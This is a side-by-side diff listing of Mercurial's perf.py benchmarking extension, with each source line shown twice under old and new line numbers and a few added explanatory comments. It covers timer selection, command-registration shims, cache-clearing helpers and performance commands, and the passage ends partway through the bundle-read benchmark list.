87 _undefined = object()
78 def safehasattr(thing, attr):
88 def safehasattr(thing, attr):
79 return getattr(thing, attr, _undefined) is not _undefined
89 return getattr(thing, attr, _undefined) is not _undefined
80 setattr(util, 'safehasattr', safehasattr)
90 setattr(util, 'safehasattr', safehasattr)
81
91
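# Unlike Python 2's hasattr(), which swallows any exception raised during
# attribute access, the sentinel-based getattr() above treats only a genuine
# AttributeError as "missing". A harmless self-check (illustration only;
# these asserts are not part of the original file):
assert safehasattr(time, 'time')
assert not safehasattr(time, 'no_such_attribute')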
82 # for "historical portability":
92 # for "historical portability":
83 # define util.timer forcibly, because util.timer has been available
93 # define util.timer forcibly, because util.timer has been available
84 # since ae5d60bb70c9
94 # since ae5d60bb70c9
85 if safehasattr(time, 'perf_counter'):
95 if safehasattr(time, 'perf_counter'):
86 util.timer = time.perf_counter
96 util.timer = time.perf_counter
87 elif os.name == 'nt':
97 elif os.name == 'nt':
88 util.timer = time.clock
98 util.timer = time.clock
89 else:
99 else:
90 util.timer = time.time
100 util.timer = time.time
91
101
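# Rationale for the preference order above: time.perf_counter (Python 3.3+)
# is monotonic with the best available resolution; time.clock provided
# high-resolution wall time on Windows; time.time is the portable fallback.
# Usage sketch:
#
#   begin = util.timer()
#   ...
#   elapsed = util.timer() - begin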
92 # for "historical portability":
102 # for "historical portability":
93 # use locally defined empty option list, if formatteropts isn't
103 # use locally defined empty option list, if formatteropts isn't
94 # available, because commands.formatteropts has been available since
104 # available, because commands.formatteropts has been available since
95 # 3.2 (or 7a7eed5176a4), even though formatting itself has been
105 # 3.2 (or 7a7eed5176a4), even though formatting itself has been
96 # available since 2.2 (or ae5f92e154d3)
106 # available since 2.2 (or ae5f92e154d3)
97 formatteropts = getattr(cmdutil, "formatteropts",
107 formatteropts = getattr(cmdutil, "formatteropts",
98 getattr(commands, "formatteropts", []))
108 getattr(commands, "formatteropts", []))
99
109
100 # for "historical portability":
110 # for "historical portability":
101 # use locally defined option list, if debugrevlogopts isn't available,
111 # use locally defined option list, if debugrevlogopts isn't available,
102 # because commands.debugrevlogopts has been available since 3.7 (or
112 # because commands.debugrevlogopts has been available since 3.7 (or
103 # 5606f7d0d063), even though cmdutil.openrevlog() has been available
113 # 5606f7d0d063), even though cmdutil.openrevlog() has been available
104 # since 1.9 (or a79fea6b3e77).
114 # since 1.9 (or a79fea6b3e77).
105 revlogopts = getattr(cmdutil, "debugrevlogopts",
115 revlogopts = getattr(cmdutil, "debugrevlogopts",
106 getattr(commands, "debugrevlogopts", [
116 getattr(commands, "debugrevlogopts", [
107 ('c', 'changelog', False, ('open changelog')),
117 ('c', 'changelog', False, ('open changelog')),
108 ('m', 'manifest', False, ('open manifest')),
118 ('m', 'manifest', False, ('open manifest')),
109 ('', 'dir', False, ('open directory manifest')),
119 ('', 'dir', False, ('open directory manifest')),
110 ]))
120 ]))
111
121
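# Either way, revlogopts supplies the -c/-m/--dir selectors understood by
# cmdutil.openrevlog(), so revlog-oriented commands can be driven as, for
# example (hypothetical invocations):
#
#   hg perfbdiff -c 1000    # run against the changelog
#   hg perfbdiff -m 1000    # run against the manifest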
112 cmdtable = {}
122 cmdtable = {}
113
123
114 # for "historical portability":
124 # for "historical portability":
115 # define parsealiases locally, because cmdutil.parsealiases has been
125 # define parsealiases locally, because cmdutil.parsealiases has been
116 # available since 1.5 (or 6252852b4332)
126 # available since 1.5 (or 6252852b4332)
117 def parsealiases(cmd):
127 def parsealiases(cmd):
118 return cmd.lstrip("^").split("|")
128 return cmd.lstrip("^").split("|")
119
129
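# The leading "^" historically marked a command as primary in help output
# and is stripped; "|" separates aliases. A quick self-check (illustration
# only; this assert is not part of the original file):
assert parsealiases("^annotate|blame") == ["annotate", "blame"]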
120 if safehasattr(registrar, 'command'):
130 if safehasattr(registrar, 'command'):
121 command = registrar.command(cmdtable)
131 command = registrar.command(cmdtable)
122 elif safehasattr(cmdutil, 'command'):
132 elif safehasattr(cmdutil, 'command'):
123 command = cmdutil.command(cmdtable)
133 command = cmdutil.command(cmdtable)
124 if 'norepo' not in getargspec(command).args:
134 if 'norepo' not in getargspec(command).args:
125 # for "historical portability":
135 # for "historical portability":
126 # wrap original cmdutil.command, because "norepo" option has
136 # wrap original cmdutil.command, because "norepo" option has
127 # been available since 3.1 (or 75a96326cecb)
137 # been available since 3.1 (or 75a96326cecb)
128 _command = command
138 _command = command
129 def command(name, options=(), synopsis=None, norepo=False):
139 def command(name, options=(), synopsis=None, norepo=False):
130 if norepo:
140 if norepo:
131 commands.norepo += ' %s' % ' '.join(parsealiases(name))
141 commands.norepo += ' %s' % ' '.join(parsealiases(name))
132 return _command(name, list(options), synopsis)
142 return _command(name, list(options), synopsis)
133 else:
143 else:
134 # for "historical portability":
144 # for "historical portability":
135 # define "@command" annotation locally, because cmdutil.command
145 # define "@command" annotation locally, because cmdutil.command
136 # has been available since 1.9 (or 2daa5179e73f)
146 # has been available since 1.9 (or 2daa5179e73f)
137 def command(name, options=(), synopsis=None, norepo=False):
147 def command(name, options=(), synopsis=None, norepo=False):
138 def decorator(func):
148 def decorator(func):
139 if synopsis:
149 if synopsis:
140 cmdtable[name] = func, list(options), synopsis
150 cmdtable[name] = func, list(options), synopsis
141 else:
151 else:
142 cmdtable[name] = func, list(options)
152 cmdtable[name] = func, list(options)
143 if norepo:
153 if norepo:
144 commands.norepo += ' %s' % ' '.join(parsealiases(name))
154 commands.norepo += ' %s' % ' '.join(parsealiases(name))
145 return func
155 return func
146 return decorator
156 return decorator
147
157
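# Whichever branch ran, `command` now accepts the modern registrar-style
# signature, so the perf commands below register uniformly. A sketch of the
# pattern they all follow (hypothetical command name, illustration only):
#
#   @command('perfnothing', formatteropts)
#   def perfnothing(ui, repo, **opts):
#       timer, fm = gettimer(ui, opts)
#       timer(lambda: None)
#       fm.end()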
148 try:
158 try:
149 import mercurial.registrar
159 import mercurial.registrar
150 import mercurial.configitems
160 import mercurial.configitems
151 configtable = {}
161 configtable = {}
152 configitem = mercurial.registrar.configitem(configtable)
162 configitem = mercurial.registrar.configitem(configtable)
153 configitem('perf', 'presleep',
163 configitem('perf', 'presleep',
154 default=mercurial.configitems.dynamicdefault,
164 default=mercurial.configitems.dynamicdefault,
155 )
165 )
156 configitem('perf', 'stub',
166 configitem('perf', 'stub',
157 default=mercurial.configitems.dynamicdefault,
167 default=mercurial.configitems.dynamicdefault,
158 )
168 )
159 configitem('perf', 'parentscount',
169 configitem('perf', 'parentscount',
160 default=mercurial.configitems.dynamicdefault,
170 default=mercurial.configitems.dynamicdefault,
161 )
171 )
162 except (ImportError, AttributeError):
172 except (ImportError, AttributeError):
163 pass
173 pass
164
174
165 def getlen(ui):
175 def getlen(ui):
166 if ui.configbool("perf", "stub", False):
176 if ui.configbool("perf", "stub", False):
167 return lambda x: 1
177 return lambda x: 1
168 return len
178 return len
169
179
170 def gettimer(ui, opts=None):
180 def gettimer(ui, opts=None):
171 """return a timer function and formatter: (timer, formatter)
181 """return a timer function and formatter: (timer, formatter)
172
182
173 This function exists to gather the creation of formatter in a single
183 This function exists to gather the creation of formatter in a single
174 place instead of duplicating it in all performance commands."""
184 place instead of duplicating it in all performance commands."""
175
185
176 # enforce an idle period before execution to counteract power management
186 # enforce an idle period before execution to counteract power management
177 # experimental config: perf.presleep
187 # experimental config: perf.presleep
178 time.sleep(getint(ui, "perf", "presleep", 1))
188 time.sleep(getint(ui, "perf", "presleep", 1))
179
189
180 if opts is None:
190 if opts is None:
181 opts = {}
191 opts = {}
182 # redirect all to stderr unless buffer api is in use
192 # redirect all to stderr unless buffer api is in use
183 if not ui._buffers:
193 if not ui._buffers:
184 ui = ui.copy()
194 ui = ui.copy()
185 uifout = safeattrsetter(ui, 'fout', ignoremissing=True)
195 uifout = safeattrsetter(ui, 'fout', ignoremissing=True)
186 if uifout:
196 if uifout:
187 # for "historical portability":
197 # for "historical portability":
188 # ui.fout/ferr have been available since 1.9 (or 4e1ccd4c2b6d)
198 # ui.fout/ferr have been available since 1.9 (or 4e1ccd4c2b6d)
189 uifout.set(ui.ferr)
199 uifout.set(ui.ferr)
190
200
191 # get a formatter
201 # get a formatter
192 uiformatter = getattr(ui, 'formatter', None)
202 uiformatter = getattr(ui, 'formatter', None)
193 if uiformatter:
203 if uiformatter:
194 fm = uiformatter('perf', opts)
204 fm = uiformatter('perf', opts)
195 else:
205 else:
196 # for "historical portability":
206 # for "historical portability":
197 # define formatter locally, because ui.formatter has been
207 # define formatter locally, because ui.formatter has been
198 # available since 2.2 (or ae5f92e154d3)
208 # available since 2.2 (or ae5f92e154d3)
199 from mercurial import node
209 from mercurial import node
200 class defaultformatter(object):
210 class defaultformatter(object):
201 """Minimized composition of baseformatter and plainformatter
211 """Minimized composition of baseformatter and plainformatter
202 """
212 """
203 def __init__(self, ui, topic, opts):
213 def __init__(self, ui, topic, opts):
204 self._ui = ui
214 self._ui = ui
205 if ui.debugflag:
215 if ui.debugflag:
206 self.hexfunc = node.hex
216 self.hexfunc = node.hex
207 else:
217 else:
208 self.hexfunc = node.short
218 self.hexfunc = node.short
209 def __nonzero__(self):
219 def __nonzero__(self):
210 return False
220 return False
211 __bool__ = __nonzero__
221 __bool__ = __nonzero__
212 def startitem(self):
222 def startitem(self):
213 pass
223 pass
214 def data(self, **data):
224 def data(self, **data):
215 pass
225 pass
216 def write(self, fields, deftext, *fielddata, **opts):
226 def write(self, fields, deftext, *fielddata, **opts):
217 self._ui.write(deftext % fielddata, **opts)
227 self._ui.write(deftext % fielddata, **opts)
218 def condwrite(self, cond, fields, deftext, *fielddata, **opts):
228 def condwrite(self, cond, fields, deftext, *fielddata, **opts):
219 if cond:
229 if cond:
220 self._ui.write(deftext % fielddata, **opts)
230 self._ui.write(deftext % fielddata, **opts)
221 def plain(self, text, **opts):
231 def plain(self, text, **opts):
222 self._ui.write(text, **opts)
232 self._ui.write(text, **opts)
223 def end(self):
233 def end(self):
224 pass
234 pass
225 fm = defaultformatter(ui, 'perf', opts)
235 fm = defaultformatter(ui, 'perf', opts)
226
236
227 # stub function, runs code only once instead of in a loop
237 # stub function, runs code only once instead of in a loop
228 # experimental config: perf.stub
238 # experimental config: perf.stub
229 if ui.configbool("perf", "stub", False):
239 if ui.configbool("perf", "stub", False):
230 return functools.partial(stub_timer, fm), fm
240 return functools.partial(stub_timer, fm), fm
231 return functools.partial(_timer, fm), fm
241 return functools.partial(_timer, fm), fm
232
242
233 def stub_timer(fm, func, title=None):
243 def stub_timer(fm, func, title=None):
234 func()
244 func()
235
245
236 def _timer(fm, func, title=None):
246 def _timer(fm, func, title=None):
237 gc.collect()
247 gc.collect()
238 results = []
248 results = []
239 begin = util.timer()
249 begin = util.timer()
240 count = 0
250 count = 0
241 while True:
251 while True:
242 ostart = os.times()
252 ostart = os.times()
243 cstart = util.timer()
253 cstart = util.timer()
244 r = func()
254 r = func()
245 cstop = util.timer()
255 cstop = util.timer()
246 ostop = os.times()
256 ostop = os.times()
247 count += 1
257 count += 1
248 a, b = ostart, ostop
258 a, b = ostart, ostop
248 results.append((cstop - cstart, b[0] - a[0], b[1] - a[1]))
258 results.append((cstop - cstart, b[0] - a[0], b[1] - a[1]))
250 if cstop - begin > 3 and count >= 100:
260 if cstop - begin > 3 and count >= 100:
251 break
261 break
252 if cstop - begin > 10 and count >= 3:
262 if cstop - begin > 10 and count >= 3:
253 break
263 break
254
264
255 fm.startitem()
265 fm.startitem()
256
266
257 if title:
267 if title:
258 fm.write('title', '! %s\n', title)
268 fm.write('title', '! %s\n', title)
259 if r:
269 if r:
260 fm.write('result', '! result: %s\n', r)
270 fm.write('result', '! result: %s\n', r)
261 m = min(results)
271 m = min(results)
262 fm.plain('!')
272 fm.plain('!')
263 fm.write('wall', ' wall %f', m[0])
273 fm.write('wall', ' wall %f', m[0])
264 fm.write('comb', ' comb %f', m[1] + m[2])
274 fm.write('comb', ' comb %f', m[1] + m[2])
265 fm.write('user', ' user %f', m[1])
275 fm.write('user', ' user %f', m[1])
266 fm.write('sys', ' sys %f', m[2])
276 fm.write('sys', ' sys %f', m[2])
267 fm.write('count', ' (best of %d)', count)
277 fm.write('count', ' (best of %d)', count)
268 fm.plain('\n')
278 fm.plain('\n')
269
279
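# The sampling policy above: repeat func() until more than 3 seconds have
# elapsed with at least 100 runs, or more than 10 seconds with at least 3
# runs, then report only the fastest sample (min by wall time) to suppress
# scheduler and cache noise. The stopping rule, restated as a pure predicate
# (illustrative only, not used by perf.py itself):
def _shouldstop(elapsed, count):
    return ((elapsed > 3 and count >= 100)
            or (elapsed > 10 and count >= 3))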
270 # utilities for historical portability
280 # utilities for historical portability
271
281
272 def getint(ui, section, name, default):
282 def getint(ui, section, name, default):
273 # for "historical portability":
283 # for "historical portability":
274 # ui.configint has been available since 1.9 (or fa2b596db182)
284 # ui.configint has been available since 1.9 (or fa2b596db182)
275 v = ui.config(section, name, None)
285 v = ui.config(section, name, None)
276 if v is None:
286 if v is None:
277 return default
287 return default
278 try:
288 try:
279 return int(v)
289 return int(v)
280 except ValueError:
290 except ValueError:
281 raise error.ConfigError(("%s.%s is not an integer ('%s')")
291 raise error.ConfigError(("%s.%s is not an integer ('%s')")
282 % (section, name, v))
292 % (section, name, v))
283
293
284 def safeattrsetter(obj, name, ignoremissing=False):
294 def safeattrsetter(obj, name, ignoremissing=False):
285 """Ensure that 'obj' has 'name' attribute before subsequent setattr
295 """Ensure that 'obj' has 'name' attribute before subsequent setattr
286
296
287 This function aborts if 'obj' doesn't have the 'name' attribute
297 This function aborts if 'obj' doesn't have the 'name' attribute
288 at runtime. This avoids overlooking a future removal of the attribute,
298 at runtime. This avoids overlooking a future removal of the attribute,
289 which would silently break the assumptions of performance measurement.
299 which would silently break the assumptions of performance measurement.
290
300
291 This function returns the object to (1) assign a new value, and
301 This function returns the object to (1) assign a new value, and
292 (2) restore an original value to the attribute.
302 (2) restore an original value to the attribute.
293
303
294 If 'ignoremissing' is true, a missing 'name' attribute doesn't cause
304 If 'ignoremissing' is true, a missing 'name' attribute doesn't cause
295 an abort, and this function returns None. This is useful for
305 an abort, and this function returns None. This is useful for
296 examining an attribute that isn't guaranteed to exist in all
306 examining an attribute that isn't guaranteed to exist in all
297 Mercurial versions.
307 Mercurial versions.
298 """
308 """
299 if not util.safehasattr(obj, name):
309 if not util.safehasattr(obj, name):
300 if ignoremissing:
310 if ignoremissing:
301 return None
311 return None
302 raise error.Abort(("missing attribute %s of %s might break assumption"
312 raise error.Abort(("missing attribute %s of %s might break assumption"
303 " of performance measurement") % (name, obj))
313 " of performance measurement") % (name, obj))
304
314
305 origvalue = getattr(obj, name)
315 origvalue = getattr(obj, name)
306 class attrutil(object):
316 class attrutil(object):
307 def set(self, newvalue):
317 def set(self, newvalue):
308 setattr(obj, name, newvalue)
318 setattr(obj, name, newvalue)
309 def restore(self):
319 def restore(self):
310 setattr(obj, name, origvalue)
320 setattr(obj, name, origvalue)
311
321
312 return attrutil()
322 return attrutil()
313
323
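# Typical use of the returned attrutil object (sketch; this mirrors how
# gettimer() above temporarily redirects output):
#
#   uifout = safeattrsetter(ui, 'fout', ignoremissing=True)
#   if uifout:
#       uifout.set(ui.ferr)    # temporarily point fout at ferr
#       ...
#       uifout.restore()       # put the original value back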
314 # utilities to examine each internal API changes
324 # utilities to examine each internal API changes
315
325
316 def getbranchmapsubsettable():
326 def getbranchmapsubsettable():
317 # for "historical portability":
327 # for "historical portability":
318 # subsettable is defined in:
328 # subsettable is defined in:
319 # - branchmap since 2.9 (or 175c6fd8cacc)
329 # - branchmap since 2.9 (or 175c6fd8cacc)
320 # - repoview since 2.5 (or 59a9f18d4587)
330 # - repoview since 2.5 (or 59a9f18d4587)
321 for mod in (branchmap, repoview):
331 for mod in (branchmap, repoview):
322 subsettable = getattr(mod, 'subsettable', None)
332 subsettable = getattr(mod, 'subsettable', None)
323 if subsettable:
333 if subsettable:
324 return subsettable
334 return subsettable
325
335
326 # bisecting in bcee63733aad::59a9f18d4587 can reach here (both
336 # bisecting in bcee63733aad::59a9f18d4587 can reach here (both
327 # branchmap and repoview modules exist, but subsettable attribute
337 # branchmap and repoview modules exist, but subsettable attribute
328 # doesn't)
338 # doesn't)
329 raise error.Abort(("perfbranchmap not available with this Mercurial"),
339 raise error.Abort(("perfbranchmap not available with this Mercurial"),
330 hint="use 2.5 or later")
340 hint="use 2.5 or later")
331
341
332 def getsvfs(repo):
342 def getsvfs(repo):
333 """Return appropriate object to access files under .hg/store
343 """Return appropriate object to access files under .hg/store
334 """
344 """
335 # for "historical portability":
345 # for "historical portability":
336 # repo.svfs has been available since 2.3 (or 7034365089bf)
346 # repo.svfs has been available since 2.3 (or 7034365089bf)
337 svfs = getattr(repo, 'svfs', None)
347 svfs = getattr(repo, 'svfs', None)
338 if svfs:
348 if svfs:
339 return svfs
349 return svfs
340 else:
350 else:
341 return getattr(repo, 'sopener')
351 return getattr(repo, 'sopener')
342
352
343 def getvfs(repo):
353 def getvfs(repo):
344 """Return appropriate object to access files under .hg
354 """Return appropriate object to access files under .hg
345 """
355 """
346 # for "historical portability":
356 # for "historical portability":
347 # repo.vfs has been available since 2.3 (or 7034365089bf)
357 # repo.vfs has been available since 2.3 (or 7034365089bf)
348 vfs = getattr(repo, 'vfs', None)
358 vfs = getattr(repo, 'vfs', None)
349 if vfs:
359 if vfs:
350 return vfs
360 return vfs
351 else:
361 else:
352 return getattr(repo, 'opener')
362 return getattr(repo, 'opener')
353
363
354 def repocleartagscachefunc(repo):
364 def repocleartagscachefunc(repo):
355 """Return the function to clear tags cache according to repo internal API
365 """Return the function to clear tags cache according to repo internal API
356 """
366 """
357 if util.safehasattr(repo, '_tagscache'): # since 2.0 (or 9dca7653b525)
367 if util.safehasattr(repo, '_tagscache'): # since 2.0 (or 9dca7653b525)
358 # in this case, setattr(repo, '_tagscache', None) and the like aren't
368 # in this case, setattr(repo, '_tagscache', None) and the like aren't
359 # the correct way to clear the tags cache, because existing code paths
369 # the correct way to clear the tags cache, because existing code paths
360 # expect _tagscache to be a structured object.
370 # expect _tagscache to be a structured object.
361 def clearcache():
371 def clearcache():
362 # _tagscache has been filteredpropertycache since 2.5 (or
372 # _tagscache has been filteredpropertycache since 2.5 (or
363 # 98c867ac1330), and delattr() can't work in such case
373 # 98c867ac1330), and delattr() can't work in such case
364 if '_tagscache' in vars(repo):
374 if '_tagscache' in vars(repo):
365 del repo.__dict__['_tagscache']
375 del repo.__dict__['_tagscache']
366 return clearcache
376 return clearcache
367
377
368 repotags = safeattrsetter(repo, '_tags', ignoremissing=True)
378 repotags = safeattrsetter(repo, '_tags', ignoremissing=True)
369 if repotags: # since 1.4 (or 5614a628d173)
379 if repotags: # since 1.4 (or 5614a628d173)
370 return lambda: repotags.set(None)
380 return lambda: repotags.set(None)
371
381
372 repotagscache = safeattrsetter(repo, 'tagscache', ignoremissing=True)
382 repotagscache = safeattrsetter(repo, 'tagscache', ignoremissing=True)
373 if repotagscache: # since 0.6 (or d7df759d0e97)
383 if repotagscache: # since 0.6 (or d7df759d0e97)
374 return lambda: repotagscache.set(None)
384 return lambda: repotagscache.set(None)
375
385
376 # Mercurial earlier than 0.6 (or d7df759d0e97) logically reaches
386 # Mercurial earlier than 0.6 (or d7df759d0e97) logically reaches
377 # this point, but that isn't a real problem, because:
387 # this point, but that isn't a real problem, because:
378 # - repo.tags of such Mercurial isn't "callable", and repo.tags()
388 # - repo.tags of such Mercurial isn't "callable", and repo.tags()
379 # in perftags() causes failure soon
389 # in perftags() causes failure soon
380 # - perf.py itself has been available since 1.1 (or eb240755386d)
390 # - perf.py itself has been available since 1.1 (or eb240755386d)
381 raise error.Abort(("tags API of this hg command is unknown"))
391 raise error.Abort(("tags API of this hg command is unknown"))
382
392
383 # utilities to clear cache
393 # utilities to clear cache
384
394
385 def clearfilecache(repo, attrname):
395 def clearfilecache(repo, attrname):
386 unfi = repo.unfiltered()
396 unfi = repo.unfiltered()
387 if attrname in vars(unfi):
397 if attrname in vars(unfi):
388 delattr(unfi, attrname)
398 delattr(unfi, attrname)
389 unfi._filecache.pop(attrname, None)
399 unfi._filecache.pop(attrname, None)
390
400
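# clearfilecache() drops both the materialized attribute and its _filecache
# slot, so the next access re-reads from disk; perfbookmarks (below) relies
# on exactly this to benchmark a cold parse:
#
#   clearfilecache(repo, '_bookmarks')
#   repo._bookmarks    # re-parses the bookmarks file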
391 # perf commands
401 # perf commands
392
402
393 @command('perfwalk', formatteropts)
403 @command('perfwalk', formatteropts)
394 def perfwalk(ui, repo, *pats, **opts):
404 def perfwalk(ui, repo, *pats, **opts):
395 timer, fm = gettimer(ui, opts)
405 timer, fm = gettimer(ui, opts)
396 m = scmutil.match(repo[None], pats, {})
406 m = scmutil.match(repo[None], pats, {})
397 timer(lambda: len(list(repo.dirstate.walk(m, subrepos=[], unknown=True,
407 timer(lambda: len(list(repo.dirstate.walk(m, subrepos=[], unknown=True,
398 ignored=False))))
408 ignored=False))))
399 fm.end()
409 fm.end()
400
410
401 @command('perfannotate', formatteropts)
411 @command('perfannotate', formatteropts)
402 def perfannotate(ui, repo, f, **opts):
412 def perfannotate(ui, repo, f, **opts):
403 timer, fm = gettimer(ui, opts)
413 timer, fm = gettimer(ui, opts)
404 fc = repo['.'][f]
414 fc = repo['.'][f]
405 timer(lambda: len(fc.annotate(True)))
415 timer(lambda: len(fc.annotate(True)))
406 fm.end()
416 fm.end()
407
417
408 @command('perfstatus',
418 @command('perfstatus',
409 [('u', 'unknown', False,
419 [('u', 'unknown', False,
410 'ask status to look for unknown files')] + formatteropts)
420 'ask status to look for unknown files')] + formatteropts)
411 def perfstatus(ui, repo, **opts):
421 def perfstatus(ui, repo, **opts):
412 #m = match.always(repo.root, repo.getcwd())
422 #m = match.always(repo.root, repo.getcwd())
413 #timer(lambda: sum(map(len, repo.dirstate.status(m, [], False, False,
423 #timer(lambda: sum(map(len, repo.dirstate.status(m, [], False, False,
414 # False))))
424 # False))))
415 timer, fm = gettimer(ui, opts)
425 timer, fm = gettimer(ui, opts)
416 timer(lambda: sum(map(len, repo.status(unknown=opts['unknown']))))
426 timer(lambda: sum(map(len, repo.status(unknown=opts['unknown']))))
417 fm.end()
427 fm.end()
418
428
419 @command('perfaddremove', formatteropts)
429 @command('perfaddremove', formatteropts)
420 def perfaddremove(ui, repo, **opts):
430 def perfaddremove(ui, repo, **opts):
421 timer, fm = gettimer(ui, opts)
431 timer, fm = gettimer(ui, opts)
422 try:
432 try:
423 oldquiet = repo.ui.quiet
433 oldquiet = repo.ui.quiet
424 repo.ui.quiet = True
434 repo.ui.quiet = True
425 matcher = scmutil.match(repo[None])
435 matcher = scmutil.match(repo[None])
426 opts['dry_run'] = True
436 opts['dry_run'] = True
427 timer(lambda: scmutil.addremove(repo, matcher, "", opts))
437 timer(lambda: scmutil.addremove(repo, matcher, "", opts))
428 finally:
438 finally:
429 repo.ui.quiet = oldquiet
439 repo.ui.quiet = oldquiet
430 fm.end()
440 fm.end()
431
441
432 def clearcaches(cl):
442 def clearcaches(cl):
433 # behave somewhat consistently across internal API changes
443 # behave somewhat consistently across internal API changes
434 if util.safehasattr(cl, 'clearcaches'):
444 if util.safehasattr(cl, 'clearcaches'):
435 cl.clearcaches()
445 cl.clearcaches()
436 elif util.safehasattr(cl, '_nodecache'):
446 elif util.safehasattr(cl, '_nodecache'):
437 from mercurial.node import nullid, nullrev
447 from mercurial.node import nullid, nullrev
438 cl._nodecache = {nullid: nullrev}
448 cl._nodecache = {nullid: nullrev}
439 cl._nodepos = None
449 cl._nodepos = None
440
450
441 @command('perfheads', formatteropts)
451 @command('perfheads', formatteropts)
442 def perfheads(ui, repo, **opts):
452 def perfheads(ui, repo, **opts):
443 timer, fm = gettimer(ui, opts)
453 timer, fm = gettimer(ui, opts)
444 cl = repo.changelog
454 cl = repo.changelog
445 def d():
455 def d():
446 len(cl.headrevs())
456 len(cl.headrevs())
447 clearcaches(cl)
457 clearcaches(cl)
448 timer(d)
458 timer(d)
449 fm.end()
459 fm.end()
450
460
451 @command('perftags', formatteropts)
461 @command('perftags', formatteropts)
452 def perftags(ui, repo, **opts):
462 def perftags(ui, repo, **opts):
453 import mercurial.changelog
463 import mercurial.changelog
454 import mercurial.manifest
464 import mercurial.manifest
455 timer, fm = gettimer(ui, opts)
465 timer, fm = gettimer(ui, opts)
456 svfs = getsvfs(repo)
466 svfs = getsvfs(repo)
457 repocleartagscache = repocleartagscachefunc(repo)
467 repocleartagscache = repocleartagscachefunc(repo)
458 def t():
468 def t():
459 repo.changelog = mercurial.changelog.changelog(svfs)
469 repo.changelog = mercurial.changelog.changelog(svfs)
460 repo.manifestlog = mercurial.manifest.manifestlog(svfs, repo)
470 repo.manifestlog = mercurial.manifest.manifestlog(svfs, repo)
461 repocleartagscache()
471 repocleartagscache()
462 return len(repo.tags())
472 return len(repo.tags())
463 timer(t)
473 timer(t)
464 fm.end()
474 fm.end()
465
475
466 @command('perfancestors', formatteropts)
476 @command('perfancestors', formatteropts)
467 def perfancestors(ui, repo, **opts):
477 def perfancestors(ui, repo, **opts):
468 timer, fm = gettimer(ui, opts)
478 timer, fm = gettimer(ui, opts)
469 heads = repo.changelog.headrevs()
479 heads = repo.changelog.headrevs()
470 def d():
480 def d():
471 for a in repo.changelog.ancestors(heads):
481 for a in repo.changelog.ancestors(heads):
472 pass
482 pass
473 timer(d)
483 timer(d)
474 fm.end()
484 fm.end()
475
485
476 @command('perfancestorset', formatteropts)
486 @command('perfancestorset', formatteropts)
477 def perfancestorset(ui, repo, revset, **opts):
487 def perfancestorset(ui, repo, revset, **opts):
478 timer, fm = gettimer(ui, opts)
488 timer, fm = gettimer(ui, opts)
479 revs = repo.revs(revset)
489 revs = repo.revs(revset)
480 heads = repo.changelog.headrevs()
490 heads = repo.changelog.headrevs()
481 def d():
491 def d():
482 s = repo.changelog.ancestors(heads)
492 s = repo.changelog.ancestors(heads)
483 for rev in revs:
493 for rev in revs:
484 rev in s
494 rev in s
485 timer(d)
495 timer(d)
486 fm.end()
496 fm.end()
487
497
488 @command('perfbookmarks', formatteropts)
498 @command('perfbookmarks', formatteropts)
489 def perfbookmarks(ui, repo, **opts):
499 def perfbookmarks(ui, repo, **opts):
490 """benchmark parsing bookmarks from disk to memory"""
500 """benchmark parsing bookmarks from disk to memory"""
491 timer, fm = gettimer(ui, opts)
501 timer, fm = gettimer(ui, opts)
492 def d():
502 def d():
493 clearfilecache(repo, '_bookmarks')
503 clearfilecache(repo, '_bookmarks')
494 repo._bookmarks
504 repo._bookmarks
495 timer(d)
505 timer(d)
496 fm.end()
506 fm.end()
497
507
498 @command('perfbundleread', formatteropts, 'BUNDLE')
508 @command('perfbundleread', formatteropts, 'BUNDLE')
499 def perfbundleread(ui, repo, bundlepath, **opts):
509 def perfbundleread(ui, repo, bundlepath, **opts):
500 """Benchmark reading of bundle files.
510 """Benchmark reading of bundle files.
501
511
502 This command is meant to isolate the I/O part of bundle reading as
512 This command is meant to isolate the I/O part of bundle reading as
503 much as possible.
513 much as possible.
504 """
514 """
505 from mercurial import (
515 from mercurial import (
506 bundle2,
516 bundle2,
507 exchange,
517 exchange,
508 streamclone,
518 streamclone,
509 )
519 )
510
520
511 def makebench(fn):
521 def makebench(fn):
512 def run():
522 def run():
513 with open(bundlepath, 'rb') as fh:
523 with open(bundlepath, 'rb') as fh:
514 bundle = exchange.readbundle(ui, fh, bundlepath)
524 bundle = exchange.readbundle(ui, fh, bundlepath)
515 fn(bundle)
525 fn(bundle)
516
526
517 return run
527 return run
518
528
519 def makereadnbytes(size):
529 def makereadnbytes(size):
520 def run():
530 def run():
521 with open(bundlepath, 'rb') as fh:
531 with open(bundlepath, 'rb') as fh:
522 bundle = exchange.readbundle(ui, fh, bundlepath)
532 bundle = exchange.readbundle(ui, fh, bundlepath)
523 while bundle.read(size):
533 while bundle.read(size):
524 pass
534 pass
525
535
526 return run
536 return run
527
537
528 def makestdioread(size):
538 def makestdioread(size):
529 def run():
539 def run():
530 with open(bundlepath, 'rb') as fh:
540 with open(bundlepath, 'rb') as fh:
531 while fh.read(size):
541 while fh.read(size):
532 pass
542 pass
533
543
534 return run
544 return run
535
545
536 # bundle1
546 # bundle1
537
547
538 def deltaiter(bundle):
548 def deltaiter(bundle):
539 for delta in bundle.deltaiter():
549 for delta in bundle.deltaiter():
540 pass
550 pass
541
551
542 def iterchunks(bundle):
552 def iterchunks(bundle):
543 for chunk in bundle.getchunks():
553 for chunk in bundle.getchunks():
544 pass
554 pass
545
555
546 # bundle2
556 # bundle2
547
557
548 def forwardchunks(bundle):
558 def forwardchunks(bundle):
549 for chunk in bundle._forwardchunks():
559 for chunk in bundle._forwardchunks():
550 pass
560 pass
551
561
552 def iterparts(bundle):
562 def iterparts(bundle):
553 for part in bundle.iterparts():
563 for part in bundle.iterparts():
554 pass
564 pass
555
565
556 def iterpartsseekable(bundle):
566 def iterpartsseekable(bundle):
557 for part in bundle.iterparts(seekable=True):
567 for part in bundle.iterparts(seekable=True):
558 pass
568 pass
559
569
560 def seek(bundle):
570 def seek(bundle):
561 for part in bundle.iterparts(seekable=True):
571 for part in bundle.iterparts(seekable=True):
562 part.seek(0, os.SEEK_END)
572 part.seek(0, os.SEEK_END)
563
573
564 def makepartreadnbytes(size):
574 def makepartreadnbytes(size):
565 def run():
575 def run():
566 with open(bundlepath, 'rb') as fh:
576 with open(bundlepath, 'rb') as fh:
567 bundle = exchange.readbundle(ui, fh, bundlepath)
577 bundle = exchange.readbundle(ui, fh, bundlepath)
568 for part in bundle.iterparts():
578 for part in bundle.iterparts():
569 while part.read(size):
579 while part.read(size):
570 pass
580 pass
571
581
572 return run
582 return run
573
583
574 benches = [
584 benches = [
575 (makestdioread(8192), 'read(8k)'),
